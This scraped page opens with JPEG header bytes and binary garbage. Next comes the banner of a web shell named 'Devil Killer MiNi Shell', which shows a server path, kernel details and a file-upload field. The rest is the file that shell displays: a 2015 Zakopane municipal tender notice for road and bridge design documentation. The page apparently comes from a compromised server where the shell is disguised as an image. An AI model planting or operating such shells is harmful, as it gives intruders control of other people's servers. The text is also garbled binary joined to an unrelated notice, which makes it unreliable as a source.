JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151021/153993-N-2015.html

<p class="kh_header"><b>Zakopane: BZP.271.67.2015wykonanie dokumentacji projektowo-kosztorysowej dla zadania inwestycyjnego nr 2011/114 Przebudowa drogi ul. Małe Żywczańskie  w Zakopanem w procedurze ZRID</b><br>
<b>Numer ogłoszenia: 153993 - 2015; data zamieszczenia: 21.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.67.2015wykonanie dokumentacji projektowo-kosztorysowej dla zadania inwestycyjnego nr 2011/114 Przebudowa drogi ul. Małe Żywczańskie  w Zakopanem w procedurze ZRID.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.Przedmiot zamówienia: wykonanie dokumentacji projektowo-kosztorysowej dla zadania inwestycyjnego nr 2011/114 Przebudowa drogi ul. Małe Żywczańskie  w Zakopanem w procedurze ZRID 
3.1.Zakres  przedmiotu zamówienia obejmuje w szczególności wykonanie dokumentacji projektowo-kosztorysowej dla zadania nr 2011/114 o nazwie  Przebudowa drogi ul. Małe Żywczańskie w Zakopanem w procedurze ZRID, polegającej na przebudowie rozbudowie budowie  drogi gminnej publicznej ul. Małe Żywczańskie, klasy D o długości ok.450 m, mostu w ciągu ul. A. Struga, skrzyżowania z drogą ul .A.Struga, wraz z urządzeniami infrastruktury technicznej oraz urządzeniami poprawiającymi bezpieczeństwo ruchu drogowego i pieszego, która winna się składać w szczególności z rozwiązań przebudowy, rozbudowy, budowy lub remontu:

3.1.1.konstrukcji jezdni,
3.1.2.zjazdów,
3.1.3.chodników,
3.1.4.urządzeń bezpieczeństwa ruchu,
3.1.5.infrastruktury obcej, kolidującej z planowana inwestycją,
3.1.6.sieci oświetlenia ulicznego,
3.1.7.systemu odwodnienia dróg,
3.1.8.obiektu mostowego.
3.2.W ramach dokumentacji  należy:
3.2.1.W zakresie organizacji prac projektowych:
3.2.1.1.zdefiniować i dokonać analizy niezbędnych do rozwiązania zagadnień i wykonania czynności związanych ze sporządzeniem dokumentacji projektowej,
3.2.1.2.zbudować i przedstawić Zamawiającemu harmonogram czynności wraz z planem opisowym,
3.2.1.3.na bieżąco pod nadzorem Zamawiającego monitorować wykonywanie harmonogramu.
3.2.2. W zakresie zawartości dokumentacji:
3.2.2.1.sporządzić bądź pozyskać aktualna mapę sytuacyjno-wysokościową i ewidencyjną, zawierającą wszystkie naniesienia niezbędne do wykonania dokumentacji projektowo-kosztorysowej drogi,
3.2.2.2.ustalić dane dotyczące przebiegu infrastruktury technicznej w projektowanym pasie drogowym na podstawie danych uzyskanych z podkładów mapowych i rozeznania w terenie,
3.2.2.3.zaprojektować zabezpieczenie infrastruktury technicznej, w razie potrzeby zaprojektować rozwiązanie kolizji sieci,
3.2.2.4.dokonać uzgodnienia projektów branżowych u odpowiednich zarządców sieci,
3.2.2.5.uwzględnić wycinkę drzew kolidujących z uzyskaniem wymaganych parametrów drogi lub ich zabezpieczenie,
3.2.2.6.pozyskać badania nośności podłoża, kruszyw gruntów i ugięć,
3.2.2.7.przedstawić rozwiązania odwodnienia korpusu drogi wraz z odprowadzeniem do odbiorników,
3.2.2.8.przedstawić rozwiązania  rozbudowy budowy przebudowy sieci oświetlenia ulicznego,
3.2.2.9.przedstawić rozwiązania projektowe dla charakterystycznych elementów projektowanej drogi (np. przebieg drogi, skrzyżowania),
3.2.2.10.wykonać projekt przebudowy rozbudowy budowy obiektu mostowego,
3.2.2.11.opracować i przedstawić Zamawiającemu do zatwierdzenia dokumentację projektowo- kosztorysową, we wszystkich branżach wynikających ze specyfiki opracowania, wraz z określeniem optymalnego terminu i planowanego czasu prowadzenia robot budowlanych,
3.2.2.12.wykonać wykaz właścicieli nieruchomości objętych inwestycja w wersji elektronicznej(Excel), z podaniem numerów działek i adresów oparty na zapisach w ewidencji nieruchomości i w księgach wieczystych wraz z podaniem ilości proponowanych podziałów dla wybranego przez Zamawiającego wariantu,
3.2.2.13.wykonać podział inwestycji na etapy z uwzględnieniem konieczności sporządzenia oddzielnych wniosków o uzyskanie pozwoleń umożliwiających prowadzenie robot budowlanych dla każdego z etapów,
3.2.2.14.pozyskać wszystkie wymagane opinie, uzgodnienia i decyzje w tym pozwolenia wodno-prawne, wynikające ze specyfiki opracowania i niezbędne do uzyskania pozwolenia na budowę,
3.2.2.15.przygotować materiały do wniosku o odstępstwa od  obowiązujących warunków technicznych dla zawartych w projekcie budowlanym rozwiązań technicznych wraz z przygotowaniem kompletnych materiałów, wniosków i przeprowadzeniem procedury, jeżeli specyfika opracowania będzie tego wymagała,
3.2.2.16.ustalić przebieg projektowanego pasa drogowego i sporządzić  operaty podziałowe służące do pozyskania gruntu na podstawie  ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji  inwestycji w zakresie dróg publicznych (Dz.U.2013.687 z późn. zm.) wraz z uzyskaniem klauzuli powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej, jeżeli specyfika opracowania będzie tego wymagała,
3.2.2.17.przygotować kompletny wniosek wraz z załącznikami do uzyskania decyzji pozwalającej na realizację prac budowlanych w procedurze ZRID,
3.2.2.18.opracować i przedstawić Zamawiającemu projekt docelowej organizacji ruchu wraz z uzyskaniem stosownych zatwierdzeń,
3.2.2.19.uczestniczyć w konsultacjach społecznych,
3.2.2.20.w opracowaniu należy uwzględnić przystosowanie do poruszania się osób niepełnosprawnych zgodnie z Zarządzeniem Nr 43/2010 Burmistrza Miasta Zakopane z dnia 8.03.2010 r. w sprawie wymogów jakim powinny odpowiadać przejścia dla pieszych, przejścia podziemne, przejścia naziemne, pochylnie, schody zewnętrzne, windy i chodniki z uwagi na  potrzeby osób niepełnosprawnych,
3.2.2.21.opracować i przedstawić Zamawiającemu  do zatwierdzenia  Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót na wszystkie elementy realizowanych robót, dostosowane do specyfiki i skomplikowania realizowanych robót

UWAGA  Przyjęte przez projektanta założenia wstępne do koncepcji podlegają  uzgodnieniu Zamawiającego.

3.3.Dokumentacja powinna zawierać  rozwiązania  architektoniczno-budowlane, które będą zgodne z warunkami technicznymi, jakim powinny odpowiadać tego typu obiekty inżynierskie  a w szczególności:
3.3.1. racjonalne rozwiązania lokalizacji i efektywne zagospodarowanie przestrzeni przeznaczonej pod inwestycję,
3.3.2.rozwiązanie komunikacji z przyległymi pasami drogowymi i terenami, z uwzględnieniem dostosowania do poruszania się osób niepełnosprawnych,
3.3.3.rozwiązania odwodnień łącznie z ich wylotem do istniejących odbiorników,
3.3.4.dowiązanie elementów projektowanej inwestycji do stanu istniejącego.
 3.4.Dokumentacja będzie opisywać jej przedmiot jako przedmiot zamówienia w 
 rozumieniu przepisów z dnia 29 stycznia 2004 r. Prawo zamówień publicznych 
(Dz.U. 2013.907 z późn. zm.) w sposób nie utrudniający uczciwej konkurencji .

3.5. Forma opracowania dokumentacji  zadania inwestycyjnego:
3.5.1. Dokumentacja zbroszurowana ( w teczkach o standardzie teczki kosztorysowej Zero Max Plus A4 zapakowane w teczki z raczka o standardzie teczki VauPe  Classic opisane trwale na trzech powierzchniach ) , w ilości:
3.5.1.1. projekt budowlany - 6 szt.( 4 szt. oprawione zgodnie z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki  Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (dz.U.2012.462 z późn.zm.),
3.5.1.2. projekt wykonawczy uzupełniający projekt budowlany - 6 szt.
3.5.1.3. specyfikacje istotnych warunków wykonania i odbioru robót - 3 szt.
3.5.1.4. kosztorys inwestorski - 2 szt.,
3.5.1.5. kompletny wniosek wraz z załącznikami do uzyskania decyzji pozwalającej na realizację prac budowlanych w procedurze ZRID - 2 szt.

3.5.2. Dokumentacja elektroniczna w formacie Word  PDF,DWG oraz dodatkowo kosztorys inwestorski w zapisie umożliwiającym odczyt w formacie Excel, a także mapę do celów projektowych w formacie DWG.

3.5.3. Układ i zawartość dokumentacji w wersji elektronicznej w formacie PDF (np. nazwy poszczególnych katalogów i plików, podpisy i pieczątki osób sporządzających dokumentację-projektant, sprawdzający,  wykonujący, weryfikator, uzgodnienia ,itp. ) powinny być identyczne z wersja papierową. Dokumentacja w formie elektronicznej powinna być odpowiednikiem wersji papierowej, wraz ze stosownymi podpisami i klauzulami.


3.5.4. Dokumentacja powinna być zgodna z obowiązującymi przepisami, w tym:
3.5.4.1. Ustawie z dnia 7 lipca 1994 r. Prawo budowlane ( tekst jednolity:Dz.U.2013.1409 z późn.zm. ),
3.5.4.2. Ustawie z dnia 21 marca 1985 r. o drogach publicznych (tekst jednolity:Dz.U.2015.460 z póżn.zm.),
3.5.4.3. Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r.  w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie ( tekst jednolity: Dz.U.2000.63.735 z póżn.zm.),
3.5.4.4. Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 2 marca  1999 r. w sprawie  warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (teks jednolity :Dz.U. 1999.43.430 z późn.zm.),
3.5.4.5.  Ustawie z dnia 10 kwietnia 2003 r.  o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz.U. 2013.687 z późn. zm.),
3.5.4.6. Ustawie z dnia 18 lipca 2001 r. Prawo wodne ( tekst jednolity: Dz.U.2012.145 z późn.zm),
3.5.4.7. Rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie  szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (teks jednolity :dz.U.2013.1129 z późn.zm),
3.5.4.8. Rozporządzeniu Ministra Infrastruktury z dnia  18 maja  2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym ( Dz.U.2004.130.1389 z późn.zm.),
3.4.4.9. Rozporządzeń wydanych na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. 2013.907 z póżn.zm.).


3.6. Zamawiający wymaga aby wykonawca udzielił na wykonane prace projektowe objęte przedmiotowym zamówieniem co najmniej 36 miesięcznej gwarancji liczonej od dnia ostatecznego odbioru  robót budowlanych  opartych na dokumentacji będącej przedmiotem niniejszego zamówienia, nie dłużej niż 60 miesięcy od dnia ostatecznego odbioru dokumentacji.

3.7. Zamawiający wymaga aby wykonawca udzielił co najmniej 36 miesięcznej rękojmi na wykonane prace projektowe objęte zamówieniem.


3.8. Zamawiający zastrzega sobie możliwość rezygnacji z wykonania wybranych prac projektowych wyszczególnionych w zał. nr 1 projektu umowy, których wykonanie okaże się niecelowe lub zbędne z uwagi na zupełność dokumentacji, w szczególności w przypadku zmian w przepisach prawa uniemożliwiających lub w znacznym stopniu utrudniających wykonanie inwestycji, negatywnego odbioru społecznego dla danej inwestycji.

3.9.Zamawiajacy informuje ,że wykonawca zapłaci kare umowna w wysokości 300,00 zł ( słownie: trzysta złotych), za każde nie wykonanie obowiązku nałożonego przez organ administracji budowlanej na zarządcę drogi, dotyczącego usunięcia nieprawidłowości i braków we wniosku ZRID i załączonej dokumentacji, w terminie do 2 dni roboczych przed terminem wyznaczonym przez organ w okresie do końca udzielonej gwarancji. Powyższa kwota  kwoty potrącana będzie z wniesionego przez Wykonawcę zabezpieczenia należytego wykonania umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli  Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert a  jeżeli okres prowadzenia działalności jest krótszy w tym okresie świadczył  usługi polegające na  wykonaniu co najmniej 2 dokumentacji projektowo-kosztorysowych drogi o długości min. 0.3 km , prowadzonych w procedurze ZRID, dla których uzyskano ostateczne decyzje pozwolenia na budowę- potwierdzone dowodami ,że świadczone  usługi zostały prawidłowo wykonane. 
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże,
że dysponuje osobami zdolnymi do realizacji zamówienia przez  osoby posiadające uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalnościach; 
-drogowej, 
-mostowej
-sieci sanitarnych
-sieci elektroenergetycznych
-sieci teletechnicznych


 lub odpowiadających  wydanych na podstawie wcześniejszych przepisów, należące do właściwej Izby samorządu zawodowego

Ocena spełnienia powyższego  warunku  będzie dokonywana
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga załączenia do oferty zestawienia asortymentu prac projektowych,(zgodnie ze wzorem stanowiącym załącznik do wzoru umowy ) które służy pomocniczo do sporządzenia oferty , a wypełnione przez wykonawcę  będzie załącznikiem do umowy o nazwie: tabela elementów rozliczeniowych i będzie służyło do wyliczenia zmniejszeń wynagrodzenia w przypadku nie wykonania całego przedmiotu umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatnosci faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 Ustawy Zamawiający informuje, że zmiana postanowień   w   zawartej umowie może nastąpić w następujących przypadkach:

1)Zmiany kluczowych specjalistów ( projektantów wykazanych w ofercie ) na inne osoby  legitymujące sie, co najmniej równoważonymi uprawnieniami, w przypadku ich śmierci, rezygnacji z pełnienia obowiązków, utraty uprawnień , choroby itp.

2).zgodnie z art. 142 ust.5 ustawy zmiany wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany:
a)stawki podatku od towarów i usług,
b)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5
ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu  lub wysokości składki na ubezpieczenie społeczne lub zdrowotne
 
1.Jeżeli Wykonawca złoży wniosek w terminie do 30 dni od daty wystąpienia zmiany wyżej skazanych przepisów to zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian o których mowa w ust. 2.
2.Jeżeli Wykonawca złoży wniosek po upływie 30 dni od daty wejścia w życie wyżej wskazanych przepisów to zmiana wysokości wynagrodzenia obowiązywać będzie od dnia złożenia wniosku.
